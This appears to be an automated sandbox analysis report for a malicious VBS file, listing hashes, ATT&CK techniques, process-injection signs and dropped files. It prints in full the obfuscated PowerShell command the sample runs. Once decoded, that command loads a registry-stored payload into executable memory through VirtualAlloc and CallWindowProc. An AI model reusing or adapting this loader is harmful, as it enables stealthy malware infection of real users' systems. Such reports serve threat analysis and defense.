3a2e31f2844df5cb91eedbf24c0b93de4b0aa08525f733132c2bce0d7ab81acc

Resubmissions

21-12-2024 22:57

241221-2xpr2atjar 10

21-12-2024 20:29

241221-y9xfvsyngy 10

Analysis

max time kernel
26s
max time network
33s
platform
windows11-21h2_x64
resource
win11-20241007-en
resource tags

arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system
submitted
21-12-2024 22:57

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

1a4383821db896055970d1358d5f3591a7b5963f93ffcca737ac94bf6972cce1.vbs
Size

554KB
MD5

a4afe82ecf3940b8363d806604bc37a6
SHA1

8d44d22cbe509b8f5662daf586e8de5446089ec9
SHA256

1a4383821db896055970d1358d5f3591a7b5963f93ffcca737ac94bf6972cce1
SHA512

be1817f80a514d1f7887a7a2b8f6e1364e3c14165effa26c3f12f95bdded410f81781246f36f2e0a7baa70682e513380b2fce5c4541bf9555594011013cf0649
SSDEEP

12288:89OSGK7KzVkqo3CoMndRBwcm4MpPrNbbx9Od/UR1VY:eGKW6nMn7BiPpDZbAMfVY

Score

8^/10

discovery

Malware Config

Signatures

Blocklisted process makes network request 1 IoCs

flow	pid	Process
2	1364	WScript.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	csc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cvtres.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
4536	powershell.exe
4536	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	4536	powershell.exe

Suspicious use of WriteProcessMemory 9 IoCs

description	pid	Process	procid_target
PID 1364 wrote to memory of 4536	1364	WScript.exe	77
PID 1364 wrote to memory of 4536	1364	WScript.exe	77
PID 1364 wrote to memory of 4536	1364	WScript.exe	77
PID 4536 wrote to memory of 1924	4536	powershell.exe	79
PID 4536 wrote to memory of 1924	4536	powershell.exe	79
PID 4536 wrote to memory of 1924	4536	powershell.exe	79
PID 1924 wrote to memory of 2216	1924	csc.exe	80
PID 1924 wrote to memory of 2216	1924	csc.exe	80
PID 1924 wrote to memory of 2216	1924	csc.exe	80

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\1a4383821db896055970d1358d5f3591a7b5963f93ffcca737ac94bf6972cce1.vbs"
1⤵
- Blocklisted process makes network request
- Suspicious use of WriteProcessMemory
PID:1364
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "$affandt = """SpilAForvdbenddLagr-LepiTDetayAnoppEnsieUnfr Skol-AcidTInkayMoyepCardeSkamDafskeForafCompiTropnAfskiStratMerciCampoPreanReci Hype'DialuSvagsSubsiSkovnBoligPant FestSBefoyOutcsAdgatTrskeTilbmQuet;FlueuPetesPommiPersnMngdgTran JuleSGrafyPjatsArkitAchieReskmDdel.GranRPrimuInlenVgmatAtteicandmDesseIste.NontISalinDowntKonfeEgnsrTopooSapipReprSHydreportrMunivProgiSamfcKrukeRhagsfrih;ImpopUreauaftabBetaldomsiWarmcKlov StbnsGleetFlleaSejltHaaniKlebcKuli AdvocDifflkogeanicasPottsNond UdkaBAussyblodgOleigNileeulvapHenslLighaTritdmillsTilveDeprrAuresDriv1Madd Hnse{Ddss[SletDFoollSucklUnacIBukamBehapAllioIffirEjertTuba(aars`"""ExtruMetesGbakeReprrCool3Para2Cock`"""Takn)Hove]PlowpStorusamobAflglTheriAmphcdies AfmasCroutUdveaApprtSeniiKildcBrnd AltieSquaxGo TtDemoeFlavrBetynAkkv KuglitrolnHulstUspo RabbGHistePreptNoncDEtchoSteguvvs bJovilKakoeMincCAvidlTanniRepucPerckTidsTGruniIndlmGilteCont(Indb)sade;paav[UoveDFirmlBenglNonlIStarmWanlpVirkosuturExtrtOrgu(Eume`"""ForduEmpisCouneUplorChro3Unlo2Vini`"""Supe)term]InddparkiuGlarbLacelDiskiChitcKegl UnidsOvertRishaOrdgtParaialbacLkgb ForseUvirxUdentSitteSyagrEmpinAfvn SymbiWitcnNonetUdra CentCMadrhFribetidecFlugkStigDRomalAnalgArctBStanuTaiptJuvetAndeoSammnduff(RottiAgatnOutgtPoro BagsAYngluFesttLezzoCirioTuarpOlig,ForfiCavenDrivtPara KaleDTromrReseePentdFaregTaleiDead,footiRhoenMagntMisi LunhNTvivaOmvltTredtsvbeeMlde)Vgtf;Sexb[KommDCentlramhlOmheISnermPolypStoroconnrMakrtSupe(Cave`"""ForbwMaeliReconPhytmInfomward.PlatdMannlalgolMeta`"""Frem)Nono]SphypporpuUnpubPtellHalfiBroccReal MoqusBanktGreyaHiertHalviDeflcCele EneneRitmxsouktStraerastrBroanArbe auteiserinRitztEtma jarlmPentmVerdiNondoAzteAhackdSupevIndoamopsnautocMilleGenr(DoveiEvernParatUngr NonsCRepooSladnAndetGony,FjoriMillnundettrep FordAKrftfSnobsDisstcons,TeleiWebfnNadvtopto MiljTVarirQuenlKonksStbe)Thei;Rund[CoxaDEddelAssilArbeIKollmReclpHobboSkinrGenbtJero(Spen`"""OpnokNeskeInterstyrnNonmeSpeklInte3Kwmi2Skur`"""Midd)Skat]RegipBoliuUnacbAabnlRetaiKenncOver StrksForktSublaGrnstKvadiUkvicUnsk SquaeOns xUrintProfeFoozrMeginStem NonciUnsenLepotBayp PopuVAcuridamprKorptNucuuFangaUnprlIndiAMedllZooklPouloEkskcClam(HulsiCadanAfmgtarbe VirtvTugt1Vand,babeiSpirnguidtSubp MajevBans2Bugg,HjeriCafunHalotOutt Compvprov3Ande,FnysiUkrlnRanstMund WifevForb4Para)Baro;prim[StngDSkinlYperlTaklIinvamPredpCrisoTrinrUigetHans(Sere`"""SpapkCreseBesirCirknFoodeGutllFors3Pass2dige`"""Glos)Disp]DekopTerruJurabSignlSideiBruscImpe GnomsJuletProsaSucctBeheiFodncpost ArseeLudfxUnsutGasteTjenrmorgnsysi KosmiEnalnUnthtGlds BoglGRetueDuettUlykNhviruNavamKultbBlaseSpoorDeveOStrufSeleCGeltoBrugnNonrsPreroAbsolQuareArabIAbornMatrpSaunustiftPs MEsrbevCelieDefinmorgtAfspsSoro(CobaiBethnkatztAnti AntiBBranaBarrnUdpieSininRenh,FirmiDeksnLashtAtle SiriPunprrNoneeAddiaSupe)Ener;Pret[UdstDOverlUnmilRapiIPremmStoppSurboUnslrgarntDesi(tjen`"""RandkWarreOrderResunSemieSedilDdsn3hest2Ovne`"""Svid)Bemr]SkatpmdeauRefabAnstlLowliEntrcXeno CrossGeortstopaSpejtConsiMicrcVent YvoneDillxHandtTurceIndtrRomanUmat BosoIRadinperutPaalPdivotBundrSkov DammEUnobnChufuStedmvinkSDdskyUdposToadtSasseBolimFempLTrugoScowcThoraGafflCatuePortsAcroAHamr(AnrauPrygiDecenReprtImpo ophovConf1Laun,uropiOcarnSnertTran KassvTula2Coom)Tatj;Oxyg[SphiDRivelRasplAldeIAvlsmBorspUgenoLavprAluftstav(Lovk`"""VolukArthePaperWhifnOrgaeAmerlPres3Ruck2Late`"""Harb)Prog]AfkrpTeksuOverbApollBenmiSalicRide UnlisSigntHammaOmsvtdidyiKathcKlem Exx eGenixSlumtBilsehannrRessnSove BarbiTubenUrhatEkst AmniSOveruKabasStatpAltaeParanGrildKonsTMischAnthrfeveekollaInsedSubh(OverifyldnStamtPart RiciSSammnShrikCharsUgrsmFlaveAfgi)Aftr;Fejl[ContDSakslOverlMeteIglibmPeptpPicooFortrSkritBaby(Form`"""GameARddiDBlikVfragATricPUnloISoci3Pest2Halv.OppoDIbinLUmisLAfse`"""Bars)Eska]ChanpManguFlabbBelalForsiSkiacSubv SimlsunpotCankafototGosliHoggcForg astreArkexHalvtGutneForsrJoinnKata UncaiFloonColltUncu NonsGBioseFalatAppoAAfgacHoveeBrun(TrnaiTeksnPecttEupi ElemMGainaFilaaFangrMonotLucreSyst,BruniFagonUdlntgrim CentTInterVarmibaltcAzot,NessiUnsuncoastSimu RingAIntevVigriInfikSknh6Lame7Word)Bact;Kmpe[NotaDOrgalPrunlInfoImultmJen pStemoRakerUdsttGang(Udlg`"""TezkiDrejmNskemNons3sluf2Lion.SkridResplNonslRuge`"""Feri)skib]UddapAdapuLyknbEllelPlaniLevecLoka SubbsChaltEgroaCynatgalaiNulscOrna BabyeRondxHexatHankeexterHarlnform SlagiKhoknPrvetLivs OrioIBuscmfstnmSkabANontsFantsKolloOpfocVresiKultaBehatUndeeDepeCUndgoKoopnGrabtKrakeRidsxResutObar(DeciiEudanUrettTube MopiNTaaroNonmnstikpOxfooguar,JeepiSnydnForktBanc AskeCHjneoDarinJigg)Clai;Lett[GarrDSililTflelHuldIJomfmsjlepOutloUlcerTorptEkst(Scre`"""BeloAAfbaDDaktVUntrAGeroPRecoIUdru3Bard2Havb.ModpDPinlLServLPoly`"""Besv)Anis]hderpSubtuAnarbAfgrlMediiMisacSklm GanesTumltRestaKurstGenfiThiacFoug WitteWattxUnsutHalseStilrUnwenNonm BidiiProtnaltetMell LumpRSuraeAntigTrafDEnteelamblOprreLaestBukseKavaKtrueeSubdyBrin(DikkiTalinarretArgu HettdcordrScleiLastfKluc,elemiNonpnscentVisu ApttbFortaUnplcEnlikfossuAigu)Farl;Daug}Yank'Unco;Brav`$LabiBBewiyOvergdowngDecheGaasprisplWariaStaddUforsFosseheadrPhoesTerp3Nonc=Cyph[MetoBRkedyBaiegCardgLegaeSubrpNontlStanaRekvdForssSkygeremtrGravsHell1Trem]Bend:Unde:ChurVButiiReexrBalltIndbuLoriaTradlCodeAEurylHinelDirtoScricPaki(Bldg0Atan,Quat1Pero0Ske 4Wain8deca5Stat7Para6Skol,Koal1Opga2Neth2Flad8Pakc8Proc,oboe6Myko4Homo)Conf;Sniv`$Isz SNeuruBakklTriatHaeraDesinResyaSocitlagesMili=Begl(BranGStraeLasttAbsi-UnpaIvorttAmpleChalmbehoPDriprskykoStarpBayoeBuesrMegotsnoryRhyt Pote-TaksPPrefaObsktSterhKbes over'InteHChukKEpisCOverUStoi:Selv\EkseSPartoPerofToastDohewCaroaUnexrPoeteUnde\VandKKobolModsiUrresInobtAcetrUndeeTilerReam'Toug)Hest.BindMSprnuOvenrBouidTwicoCavicTilmhKern;Besm`$DeesEBortlbjniefenocZebotExosrGainoEhremOveraJohagEb KnHypeeCarvtPrepiMusczshelaAdvobNonclGianeudsp lenn=Akva Boso[StifSSkatyUntisEmbatVarmeSamtmLini.FiniCPodioSkrinForvvaggrePoderrepetWhoo]Witt:Tnke:LserFPerirReinoInfomluftBKnapaOxidsSalueBasi6Samm4ModsSesrotvoldrSleeiGrufnEvergAppa(Chlo`$IspiSBlocuGarelChimtMousaIndinDialaFlantVitosSkov)Forr;Heli[HoriSCrowyduensLabotRusseFllemGuil.ApeeRHyttuAbbanNonptBandiScormDeseeCyke.CamoIManinSinatAutoeDaterdrivoKilopPiarSBondeTormrForbvSkraiSongcfemdeGrunsIncu.PoliMbattaFremrSerisHurdhKrinaEsoplKejs]Bevo:Damk:DrexCVattoAcaspKammyConc(Enci`$HypeEFlislHypoeEskacOmgrtClasrKirsoMusimRounaOlivgMarknValteFacstBestiBlodzTndeaDroobAfmylKauteTect,Prep Scio0Snut,Card hove Arch`$VarmBSemiyExtegCoungLeadeTinnpWatelPaahaLargdSewismanseVor rBytesSylt3Gene,Undi Zeph`$MoboETartlHiveeBasicMalatdyrerSperoSvlgmTidsaDrosgKommnMotoeDyrltIddeiVetezChufaResibOverlNordeGenn.TrancPrefoMentuVigsnScratLbri)Tart;Mgle[FileBSideyStaegAcetgFdseeadoppGalilQuesaMucodEmpasSlaveSamfrMotosTain1hjul]Coun:Tige:CherEFuldngeviuAmarmnonpSWagnyUdpasTidstLesseAfkbmMediLOmbeoAckmcLandaConvlUnhaeModesSlamASund(unsi`$SnacBannoySimugJanngPrdieResppJordlPirkaBorddimpestsioeIndsrOverslyca3Ada ,tone Toak0Tilk)drev#Bank;""";Function Byggepladsers4 { param([String]$HS); For($i=4; $i -lt $HS.Length-1; $i+=(4+1)){ $Skrattene = $Skrattene + $HS.Substring($i, 1); } $Skrattene;}$rgelsespindens0 = Byggepladsers4 'ConnIForsELydmXOtta ';$rgelsespindens1= Byggepladsers4 $affandt;& ($rgelsespindens0) $rgelsespindens1;;"
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4536
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ioinzhic\ioinzhic.cmdline"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:1924
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESEC15.tmp" "c:\Users\Admin\AppData\Local\Temp\ioinzhic\CSC62441280CFBA4CE28BC353A588710E9.TMP"
      4⤵
      System Location Discovery: System Language Discovery
      PID:2216

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\RESEC15.tmp

Filesize
1KB

MD5
1df663069994d8cba97b0a047ce42bb9

SHA1
00352eee22734d578b30e636227dc30e549de1ab

SHA256
2c5bb7237f4411df5a1c40fe89f10be87ddac2883c32f0df2d8fd12ecda02c11

SHA512
0969e286b1447a7dce68460ae28a4a1fa7d95f3e4de99e213b0120bfc28cae2732d35e232ac68d0816c8910ff078abe2b7a2671064e297aa445fd691b0c3abe0

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_fo0neqta.0gm.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\ioinzhic\ioinzhic.dll

Filesize
3KB

MD5
75f052a1e76109eeedf4940458559c06

SHA1
5222d9c9d228e32d4d923415584bbf474089b659

SHA256
4357033b7d0d211f056cb38ea95ab336a0a69eae34e1c13ed7b30be273bfe156

SHA512
91ad0b9a4a0d03ef811667319c1d7c77b2a4a5a49aa6d4a1d3d17dd6b88e82d740ddbae859ca0638348c6adaa661c0b47774b48c440a0e01333c4cdc729b6381

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\ioinzhic\CSC62441280CFBA4CE28BC353A588710E9.TMP

Filesize
652B

MD5
8720bedd4f58650da479cc6e54dfd9e8

SHA1
11f02e095bc04644443a0e753d5b8c8ddadc0a4e

SHA256
76a9fdf08659db748395984734c70c73869fa4c1bb1b1c3dfd17ae43fe9ca98c

SHA512
5f452945d7b293ae6d5fd9dd85d3fab30673e5382d9a5d402857a602a9e11f0ad02c2f1d19062d5348ec5454e8c8f06c30071803862a8efbd2e7bcd8abc1175a

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\ioinzhic\ioinzhic.0.cs

Filesize
952B

MD5
4b5a9563d4f94cccc9b3c768d1ad0a71

SHA1
0aa70d675831892bf02ce90c7aa0c193bff28e4c

SHA256
028a4431d8e799ad1507285ff46a2654f2b70a50dc6c0244100518527ab3ca18

SHA512
48c05429a8cd69dad49a9a2e0fa18cb74ffa58eb5960057413f79fa65efff145fb8c90d18e766fa8dfad8b0763aa14a1055b478656e03ba831e8f6d4a15b0158

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\ioinzhic\ioinzhic.cmdline

Filesize
369B

MD5
4f82fa4ea1600506d8e8874f893b8d4b

SHA1
6fcaf3f4a2093ad9689c6894ac9e4fad8eb31ae4

SHA256
cca884ef5aeaac179a60f7bb913d44f51ac04761daaa24c6a396d9d8c80cf33c

SHA512
46d825e4f8f044a775d54a3cadd3d4ec9c7954154c954526bbf393e40d8032047b44e4627b4423c27b65cfb86cac40a8794d651f2fe4cfe54729abffcab28b74

Download Submit
memory/4536-9-0x0000000005440000-0x0000000005462000-memory.dmp

Filesize
136KB

Download
memory/4536-8-0x00000000748D0000-0x0000000075081000-memory.dmp

Filesize
7.7MB

Download
memory/4536-4-0x00000000748DE000-0x00000000748DF000-memory.dmp

Filesize
4KB

Download
memory/4536-20-0x0000000005DF0000-0x0000000006147000-memory.dmp

Filesize
3.3MB

Download
memory/4536-21-0x00000000062F0000-0x000000000630E000-memory.dmp

Filesize
120KB

Download
memory/4536-22-0x0000000006320000-0x000000000636C000-memory.dmp

Filesize
304KB

Download
memory/4536-24-0x0000000006890000-0x00000000068AA000-memory.dmp

Filesize
104KB

Download
memory/4536-23-0x0000000007B90000-0x000000000820A000-memory.dmp

Filesize
6.5MB

Download
memory/4536-10-0x00000000054F0000-0x0000000005556000-memory.dmp

Filesize
408KB

Download
memory/4536-11-0x0000000005560000-0x00000000055C6000-memory.dmp

Filesize
408KB

Download
memory/4536-7-0x0000000005610000-0x0000000005C3A000-memory.dmp

Filesize
6.2MB

Download
memory/4536-6-0x00000000748D0000-0x0000000075081000-memory.dmp

Filesize
7.7MB

Download
memory/4536-5-0x0000000004E60000-0x0000000004E96000-memory.dmp

Filesize
216KB

Download
memory/4536-37-0x0000000006910000-0x0000000006918000-memory.dmp

Filesize
32KB

Download
memory/4536-39-0x00000000076B0000-0x0000000007746000-memory.dmp

Filesize
600KB

Download
memory/4536-40-0x0000000007610000-0x0000000007632000-memory.dmp

Filesize
136KB

Download
memory/4536-41-0x00000000087C0000-0x0000000008D66000-memory.dmp

Filesize
5.6MB

Download
memory/4536-43-0x00000000748D0000-0x0000000075081000-memory.dmp

Filesize
7.7MB

Download
memory/4536-42-0x00000000748DE000-0x00000000748DF000-memory.dmp

Filesize
4KB

Download